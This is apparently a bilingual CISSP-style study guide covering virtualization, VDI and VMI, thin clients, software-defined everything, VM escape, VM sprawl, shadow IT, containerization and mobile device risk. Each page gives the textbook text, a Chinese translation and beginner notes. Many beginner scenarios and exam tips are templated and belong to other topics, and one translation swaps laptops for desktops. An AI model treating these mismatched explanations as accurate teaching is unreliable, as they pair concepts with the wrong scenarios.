Virtual desktop infrastructure (VDI) is a means to reduce the security risk and performance requirements of end devices by hosting desktop/workstation OS virtual machines on central servers that are remotely accessed by users. Thus, VDI is also known as a virtual desktop environment (VDE). Users can connect to the server to access their desktop from almost any system, including from mobile devices. Persistent virtual desktops retain a customizable desktop for the user. Nonpersistent virtual desktops are identical and static for all users. If a user makes changes, the desktop reverts

中文直译 / 整理

操作系统虚拟化的概念催生了其他虚拟化主题,例如虚拟化网络。 虚拟化网络 或网络虚拟化是将硬件和软件网络组件组合成一个统一的整体。 由此产生的解 决方案允许通过软件控制所有网络功能:管理、流量整形、地址分配等。 一个 单一的管理控制台或界面即可用于监控整个虚拟网络的各个方面,而过去则需 要物理上访问每个硬件组件。 虚拟化网络已成为全球企业部署和管理基础设施 的流行方式。 它们使组织能够实施或适应其他有趣的网络解决方案,包括S DN、虚拟SAN、客户机操作系统和端口隔离。 自定义 虚拟网络分段 可用于虚拟机,使客户操作系统成为与主机相同网络分 区的成员,或将客户操作系统置于备用网络分区中。 虚拟机可以被设为与主机 不同的网络段的成员,或置于仅虚拟存在且与物理网络介质无关的网络中(本 质上是软件定义网络; 参见 第11章)。 软件定义一切 虚拟化超越了服务器和网络。 软件定义一切(SDx) 指的是利用虚拟化用软 件替代硬件的趋势。

SDx 包括虚拟化、虚拟化软件、虚拟网络、容器化、无服 务器架构(第16章)、XaaS(第16章)、基础架构即代码(IaC)、SDN(第 11章)、虚拟存储区域网络(VSAN)(第11章)、软件定义存储(SDS) (第11章)、VDI、VMI、SDV 和软件定义数据中心(SDDC)。 本章或第11章中未定义的SDx示例将在本处讨论。 虚拟桌面基础架构(VDI)是一种通过托管来降低终端设备的安全风险和性能要求的 方法 部署在中心服务器上的桌面/工作站操作系统虚拟机,用户可远程访问。 因此, VDI 也被称为虚拟桌面环境(VDE)。 用户可以从几乎任何系统(包括移动设 备)连接到服务器以访问其桌面。 持久性虚拟桌面为用户保留可自定义的桌面。 非持久性虚拟桌面对所有用户而言都是相同且静态的。 如果用户进行了更改, 桌面将恢复

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 62 / PDF P605

第 605 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

to a known state after the user logs off. (See the discussion of static systems earlier in this chapter under “Static Systems.”) VDI has been adopted into mobile devices and has already been widely used in relation to tablets and laptop computers. It is a means to retain storage control on central servers, gain access to higher levels of system processing and other resources, and allow lower-end devices access to software and services beyond their hardware's capacity. This has led to virtual mobile infrastructure (VMI), where the OS of a mobile device is virtualized on a central server.

Thus, most of the actions and activities of the traditional mobile device no longer occur on the mobile device itself. This remote virtualization allows an organization greater control and security than when using a standard mobile device platform. It can also enable personally owned devices to interact with the VDI without increasing the risk profile. A thin client is a computer or mobile device with low to modest capability or a virtual interface that is used to remotely access and control a mainframe, virtual machine, VDI, or VMI. Thin clients were common in the 1980s when most computation took place on a central mainframe computer.

Today, thin clients are being reintroduced as a means to reduce the expenses of high-end endpoint devices where local computation and storage are not required or are a significant security risk. A thin client can be used to access a centralized resource hosted on-premises or in the cloud. All processing/storage is performed on the server or central system, so the thin client provides the user with display, keyboard, and mouse/touchscreen functionality. Software-defined visibility (SDV) is a framework to automate the processes of network monitoring and response.

The goal is to enable the analysis of every packet and make deep intelligence-based decisions on forwarding, dropping, or otherwise responding to threats. SDV is intended to benefit companies, security entities, and managed service providers (MSPs). The goal of SDV is to automate detection, reaction, and response. SDV provides security and IT management with oversight into all aspects of the company network, both on-premises and in the cloud, with an emphasis on defense and efficiency. SDV is another derivative of IaC.

Software-defined data center (SDDC) or virtual data center (VDC) is the concept of replacing physical IT elements with solutions provided virtually, and often by an external third party, such as a cloud service provider (CSP). SDDC is effectively another XaaS (i.e., anything as a service, i.e., a cloud technology) concept, namely IT as a service (ITaaS). It is similar to

中文直译 / 整理

到用户注销后的已知状态。 (参见本章前面“静态系统”部分对静态系统的讨论。 ) VDI 已被应用于移动设备,并已在平板电脑和笔记本电脑中得到广泛应用。 它 是一种保留中央服务器上存储控制、获取更高水平的系统处理能力及其他资源, 并允许低端设备访问超出其硬件能力的软件和服务的手段。 这催生了虚拟移动 基础设施(VMI),即移动设备的操作系统在中央服务器上进行虚拟化。 因此, 传统移动设备的大部分操作和活动不再发生在移动设备本身。 这种远程虚拟化 使组织能够比使用标准移动设备平台获得更大的控制权和安全性。 它还能使个 人拥有的设备在不增加风险轮廓的情况下与 VDI 交互。 一个瘦客户端是一种功能较低或中等的计算机或移动设备,或一个虚拟接口, 用于远程访问和控制大型机、虚拟机、VDI 或 VMI。 在 1980 年代,当大部分 计算都在中央大型机上进行时,瘦客户端十分普遍。 如今,瘦客户端正被重新 引入,作为一种降低高端终端设备成本的手段,这些设备无需本地计算和存储, 或本地计算和存储会带来重大安全风险。 瘦客户端可用于访问本地或云端托管 的集中式资源。

所有处理和存储均在服务器或中央系统上执行,因此瘦客户端 仅为用户提供显示、键盘和鼠标/触摸屏功能。 软件定义可视性(SDV) 是一种自动化网络监控和响应流程的框架。 其目标是 实现对每个数据包的分析,并基于深度智能做出转发、丢弃或以其他方式应对 威胁的决策。 SDV 旨在使企业、安全机构和托管服务提供商(MSPs)受益。 SDV 的目标是自动化检测、响应和应对。 SDV 为安全和 IT 管理提供对公司网 络所有方面的全面监控,涵盖本地和云端,重点在于防御和效率。 SDV 是 I aC 的另一种衍生形式。 软件定义数据中心(SDDC)或虚拟数据中心(VDC)是指用虚拟方式提供 的解决方案替代物理IT元素,这些解决方案通常由外部第三方(如云服务提 供商(CSP))提供。 SDDC本质上是另一种XaaS(即一切即服务,一种云 技术)概念,即IT即服务(ITaaS)。 它类似于

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 605 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 63 / PDF P606

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

infrastructure as a service (IaaS); thus, some claim it is nothing more than a marketing or advertising term of misdirection. To explore SDx further, you will find a wealth of articles at: sdxcentral.com, and you might want to start with “What Is Software Defined Everything – Part 1: Definition of SDx” at www.sdxcentral.com/cloud/definitions/software-defined-everything-sdxpart-1-definition. Virtualization Security Management The primary software component in virtualization is a hypervisor. The hypervisor manages the VMs, virtual data storage, and virtual network components. As an additional layer of software on the physical server, it represents an additional attack surface.

If an attacker can compromise a physical host, the attacker can potentially access all of the virtual systems hosted on the physical server. Administrators often take extra care to ensure that virtual hosts are hardened. Although virtualization can simplify many IT concepts, it's important to remember that many of the same basic security requirements still apply. Virtualization doesn't lessen the security management requirements of an OS. Thus, patch management is still essential. For example, each VM's guest OS still needs to be updated individually. Updating the host system doesn't update the guest OSs. Also, don't forget that you need to keep the hypervisor updated as well.

When using virtualized systems, it's important to protect the stability of the host. This usually means avoiding using the host for any purpose other than hosting the virtualized elements, especially in a server-focused deployment. If host availability is compromised, the availability and stability of the virtual systems are also compromised. Additionally, organizations should maintain backups of their virtual assets. Many virtualization tools include built-in tools to create full backups of virtual systems and create periodic snapshots, allowing relatively easy pointin-time restores. Virtualized systems should be security tested.

The virtualized OSs can be tested in the same manner as hardware installed OSs, such as with vulnerability assessment and penetration testing.

中文直译 / 整理

基础设施即服务(IaaS); 因此,有些人认为它只不过是误导性的营销或广告术 语。 要进一步探索SDx,您可以在以下地址找到大量文章: sdxcentral.com,您可 能想从《什么是软件定义一切——第一部分:SDx的定义》开始阅读,地址为: www.sdxcentral.com/cloud/definitions/software-defined-everything-sdxpart-1-definition. 虚拟化安全管理 虚拟化中的主要软件组件是hypervisor。 hypervisor管理虚拟机、虚拟数据 存储和虚拟网络组件。 作为物理服务器上的额外软件层,它构成了额外的攻击 面。 如果攻击者能够入侵物理主机,则可能访问该物理服务器上托管的所有虚 拟系统。 管理员通常会格外小心,确保虚拟主机得到加固。 尽管虚拟化可以简化许多IT概念,但请记住,许多基本的安全要求仍然适用。 虚拟化并不会降低操作系统的安全管理要求。 因此,补丁管理仍然是必不可少 的。 例如,每个虚拟机的客户操作系统仍需单独更新。 更新主机系统并不会更 新客户操作系统。 此外,别忘了还需要保持hypervisor的更新。

在使用虚拟化系统时,保护主机的稳定性至关重要。 这通常意味着避免将主机 用于任何其他目的,尤其是在以服务器为重点的部署中。 如果主机的可用性受 到影响,虚拟系统的可用性和稳定性也会受到影响。 此外,组织应维护其虚拟资产的备份。 许多虚拟化工具都内置了创建虚拟系统 完整备份和定期快照的工具,从而实现相对容易的基于时间点的恢复。 虚拟化系统应进行安全测试。 虚拟化操作系统可以像硬件安装的操作系统 一样进行测试,例如通过漏洞评估和渗透测试。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 64 / PDF P607

第 607 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

VM sprawl occurs when an organization deploys numerous virtual machines without an overarching IT management or security plan in place. Although VMs are easy to create and clone, they have the same licensing and security management requirements as a metal-installed OS. Uncontrolled VM creation can quickly lead to a situation where manual oversight cannot keep up with system demand. To prevent or avoid VM sprawl, a policy for developing and deploying VMs must be established and enforced. This should include establishing a library of initial or foundation VM images that are to be used to develop and deploy new services.

In some instances, VM sprawl relates to the use of lower-powered equipment that results in poorly performing VMs. VM sprawl is a virtual variation of server sprawl and could allow for virtual shadow IT. Server Sprawl and Shadow IT Server sprawl or system sprawl is the situation where numerous underutilized servers are operating in your organization's server room. These servers are taking up space, consuming electricity, and placing demands on other resources, but their provided workload or productivity does not justify their presence. This can occur if an organization purchases cheap lower-end hardware in bulk instead of selecting optimal equipment for specific use cases.

Somewhat related to server sprawl is shadow IT. Shadow IT is a term used to describe the IT components (physical or virtual) deployed by a department without the knowledge or permission of senior management or the IT group. The existence of shadow IT is often due to complex bureaucracy that makes the acquisition of needed equipment overly difficult and time-consuming. Other terms that might be used to refer to shadow IT include embedded IT, feral IT, stealth IT, hidden IT, secret IT, and client IT. Shadow IT usually does not follow company security policy, and it might not be kept current and updated with patches.

Shadow IT often lacks proper documentation, is not under consistent oversight and control, and may not be reliable or fault-tolerant. Shadow IT greatly increases the risk of disclosure of sensitive, confidential, proprietary, and personal information to unauthorized insiders and outsiders. Shadow IT can be composed of physical devices, virtual machines, or cloud services.

中文直译 / 整理

虚拟机蔓延发生在组织在没有整体IT管理或安全计划的情况下部署大量虚 拟机时。 尽管虚拟机易于创建和克隆,但它们与物理机安装的操作系统具有相 同的许可和安全管理要求。 不受控制的虚拟机创建会迅速导致手动监管无法跟 上系统需求的情况。 为防止或避免虚拟机蔓延,必须建立并执行虚拟机开发和 部署的政策。 这应包括建立用于开发和部署新服务的初始或基础虚拟机镜像库。 在某些情况下,虚拟机蔓延与使用低性能设备导致虚拟机性能不佳有关。 虚拟 机蔓延是服务器蔓延的虚拟变体,可能导致虚拟的影子IT。 服务器蔓延与影子IT 服务器蔓延或系统蔓延是指组织服务器机房中运行着大量利用率低下的服 务器。 这些服务器占用了空间,消耗电力,并对其他资源提出需求,但其 提供的工作负载或生产力并不能证明其存在的合理性。 如果组织大量采购 廉价的低端硬件,而非为特定用途选择最优设备,就可能发生这种情况。 与服务器蔓延 somewhat 相关的是影子IT。 影子IT是一个术语,用于描 述由部门在未经高级管理层或IT部门知晓或许可的情况下部署的IT组件 (物理或虚拟)。 影子IT的存在通常是因为复杂的官僚程序使得所需设备 的采购变得异常困难和耗时。

其他可能用于指代影子IT的术语包括嵌入式 IT、野化IT、隐匿IT、隐藏IT、秘密IT和客户端IT。 影子IT通常不遵循公司安全策略,可能未及时更新和打补丁。 影子IT通常 缺乏适当文档,不受一致的监督和控制,且可能不可靠或不具备容错能力。 影子IT大大增加了敏感、机密、专有和个人信息被未经授权的内部人员和 外部人员泄露的风险。 影子IT可由物理设备、虚拟机或云服务组成。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 607 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 65 / PDF P608

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

VM escaping occurs when software within a guest OS is able to breach the isolation-protection provided by the hypervisor to violate the container of other guest OSs or to infiltrate a host OS. Several VM escape vulnerabilities have been discovered in a variety of hypervisors. Fortunately, the vendors have been fast to release patches. For example, Virtualized Environment Neglected Operations Manipulation (VENOM) (CVE-2015-3456) was able to breach numerous VM products that employed a compromised open source virtual floppy disk driver to allow malicious code to jump between VMs and even access the host. VM escaping can be a serious problem, but steps can be implemented to minimize the risk.

First, keep highly sensitive systems and data on separate physical machines. An organization should already be concerned about overconsolidation resulting in a single point of failure; running numerous hardware servers so that each supports a handful of guest OSs helps with this risk. Keeping enough physical servers on hand to maintain physical isolation between highly sensitive guest OSs will further protect against a VM escape exploit. Second, keep all hypervisor software current with vendor-released patches. Third, monitor attack, exposure, and abuse indexes for new threats to your environment.

To search for, locate, or research vulnerabilities, exploits, and attacks (whether related to virtualization or not), use exploitdb.com, cve.org, and nvd.nist.gov. Containerization Containerization is the next stage in the evolution of the virtualization trend for both internally hosted systems and cloud providers and services. A virtual machine–based system uses a hypervisor installed onto the bare metal of the host server and then operates a full guest OS within each virtual machine, and each virtual machine often supports only a single primary application. This is a resource-wasteful design and reveals its origins as separate physical machines.

Containerization or OS-virtualization is based on the concept of eliminating the duplication of OS elements in a virtual machine. Instead, each application

中文直译 / 整理

虚拟机逃逸是指客户操作系统内的软件能够突破虚拟机监视器提供的隔离 保护,侵犯其他客户操作系统的容器或渗透主机操作系统。 已在多种虚拟机监 视器中发现了多个虚拟机逃逸漏洞。 幸运的是,厂商已迅速发布补丁。 例如, 虚拟化环境被忽视的操作操纵(VENOM)(CVE‑2015‑3456)利用了一个被 攻破的开源虚拟软盘驱动程序,使恶意代码能够在虚拟机之间跳跃,甚至访问 主机。 虚拟机逃逸可能是一个严重的问题,但可以采取措施来降低风险。 首先,将高 度敏感的系统和数据放在独立的物理机器上。 组织应已关注过度整合导致单点 故障的问题; 运行多台硬件服务器,每台仅支持少量客户操作系统,有助于缓 解这一风险。 保留足够的物理服务器,以在高度敏感的客户操作系统之间维持 物理隔离,将进一步防范虚拟机逃逸攻击。 其次,保持所有虚拟机监控程序软 件及时更新厂商发布的补丁。 第三,监控针对您环境的新威胁的攻击、暴露和 滥用指数。 要搜索、定位或研究漏洞、利用和攻击(无论是否与虚拟化相关), 请使用 exploit-db.com、 cve.org和 nvd.nist.gov。 容器化 容器化是虚拟化趋势在内部托管系统和云提供商及服务中的下一个阶段。

基于 虚拟机的系统在主机服务器的裸金属上安装虚拟机监控程序,然后在每个虚拟 机中运行完整的客户操作系统,每个虚拟机通常仅支持单个主要应用程序。 这 是一种资源浪费的设计,反映了其源自独立物理机器的起源。 容器化或OS-virtualization基于消除虚拟机中操作系统元素重复的概念。 相反,每 个应用程序

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 66 / PDF P609

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

is placed into a container that includes only the actual resources needed to support the enclosed application, and the common or shared OS elements are then part of the container engine. Some deployments (such as Docker and Kubernetes) eliminate the hypervisor altogether and use a collection of common binaries and libraries for the containers to call upon when needed. Containerization is able to provide 10 to 100 times more application density per physical server than that provided by traditional hypervisor virtualization solutions. Application cells or application containers (Figure 9.4) are used to virtualize software so that they can be ported to almost any OS.

FIGURE 9.4 Application containers versus a hypervisor There are many different technological solutions that are grouped into the concept of containerization. Some containerization solutions allow for multiple concurrent applications within a single container, whereas others are limited to one per container. Many containerization solutions allow for customization of how much interaction applications in separate containers are allowed. Mobile Devices A mobile device is anything with a battery (unless you also want to include things that are field powered, solar powered, etc., so generally anything that does not need a power cord to operate). However, we mostly discuss issues

中文直译 / 整理

被放置到一个仅包含支持所嵌入应用程序所需实际资源的容器中,而公共或共 享的操作系统元素则成为容器引擎的一部分。 一些部署(如Docker和 Kubernetes)完全消除了虚拟机监控程序,而是使用一组公共的二进制文件 和库,供容器在需要时调用。 容器化能够提供比传统虚拟机监控程序虚拟化解 决方案高出10到100倍的应用密度每物理服务器。 应用单元 或 应用容器(图 9.4)用于虚拟化软件,以便将其移植到几乎任何操作 系统。 图 9.4 应用容器与虚拟机监控程序 有许多不同的技术解决方案被归入容器化这一概念。 一些容器化解决方案允 许在单个容器内运行多个并发应用程序,而其他解决方案则限制每个容器只 能运行一个应用程序。 许多容器化解决方案允许自定义不同容器中的应用程 序之间的交互程度。 移动设备 一个 移动设备 是指任何带有电池的设备(除非你还想包括由现场供电、太阳能供电等 的设备,因此通常指不需要电源线即可运行的任何设备)。 然而,我们主要讨论的问 题

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 67 / PDF P610

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

related to smartphones, tablets, or portable computers (i.e., notebooks and laptops). It may be tempting to only consider smartphones in relation to mobile device questions, but you should also consider the question in regard to a laptop computer, a tablet, and maybe even a smart watch or fitness tracker. These other perspectives may assist you in answering the question correctly. Some mobile devices have less than typical default or even available security features because they often run stripped-down OSs or custom mobile OSs without the long history of security improvements found in popular PC OSs.

Many of the “features” of a mobile device can be the focus of attacks, compromises, and intrusions. Extra care and attention need to be paid to any mobile device's security for both personal and business/work use. Smartphones and other mobile devices present an ever-increasing security risk as they become more and more capable of interacting with the Internet as well as corporate networks. These devices have internal memory and may support removable memory cards that can hold a significant amount of data. Additionally, many devices include applications that allow users to read and manipulate different types of files and documents.

When personally owned devices are allowed to enter and leave a secured facility without limitation, oversight, or control, the potential for harm is significant. Malicious insiders can bring in malicious code from outside on various storage devices, including mobile phones, audio players, digital cameras, memory cards, optical discs, and Universal Serial Bus (USB) drives. These same storage devices can be used to leak or steal internal confidential and private data to disclose it to the outside world. Malicious insiders can execute malicious code, visit dangerous websites, or intentionally perform harmful activities.

Mobile devices often contain sensitive data such as contacts, text messages, email, scheduling information, and possibly notes and documents. Any mobile device with a camera feature can take photographs of sensitive information or locations. The loss or theft of a mobile device could mean the compromise of personal and/or corporate secrets. Additionally, mobile devices aren't immune to eavesdropping. With the right type of sophisticated equipment, most mobile phone conversations can be tapped into—not to mention the fact that anyone nearby can hear you talking. Employees should be coached to be discreet about what they discuss over mobile phones in public spaces.

中文直译 / 整理

与智能手机、平板电脑或便携式计算机(即笔记本电脑和台式机)相关。 也许 你会倾向于仅在移动设备问题的背景下考虑智能手机,但你也应从笔记本电脑、 平板电脑,甚至智能手表或健身追踪器的角度来思考该问题。 这些其他视角可 能有助于你正确回答问题。 一些移动设备由于通常运行精简版操作系统或自定义移动操作系统,而这些系 统缺乏流行PC操作系统长期积累的安全改进,因此其默认或可用的安全功能 往往较少。 移动设备的许多“功能”都可能成为攻击、渗透和入侵的目标。 无 论是个人使用还是工作用途,都必须对任何移动设备的安全性给予额外的关注 和重视。 智能手机和其他移动设备在能够越来越多地与互联网以及企业网络交互的同时, 其安全风险也在不断上升。 这些设备具有内部存储空间,并可能支持可移除存 储卡,可用于存储大量数据。 此外,许多设备包含允许用户读取和操作不同类 型文件与文档的应用程序。 当个人拥有的设备在没有限制、监督或控制的情况 下自由进出安全区域时,潜在的危害十分严重。 恶意内部人员可以通过各种存储设备(包括移动电话、音频播放器、数码相机、 存储卡、光盘和通用串行总线(USB)驱动器)从外部引入恶意代码。

这些相 同的存储设备也可用于泄露或窃取内部机密和私人数据,并将其披露给外部世 界。 恶意内部人员可以执行恶意代码、访问危险网站,或故意实施有害活动。 移动设备通常包含敏感数据,如联系人、短信、电子邮件、日程信息,以及可 能的笔记和文档。 任何带有摄像头功能的移动设备都可以拍摄敏感信息或地点 的照片。 移动设备的丢失或被盗可能导致个人和/或企业机密的泄露。 此外,移动设备也无法避免被窃听。 借助适当类型的精密设备,大多数手机通 话都可能被截取——更不用说附近任何人可能听到你的谈话。 应指导员工在公 共场所使用手机时谨慎讨论敏感内容。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

程序:程序是一步一步怎么做。

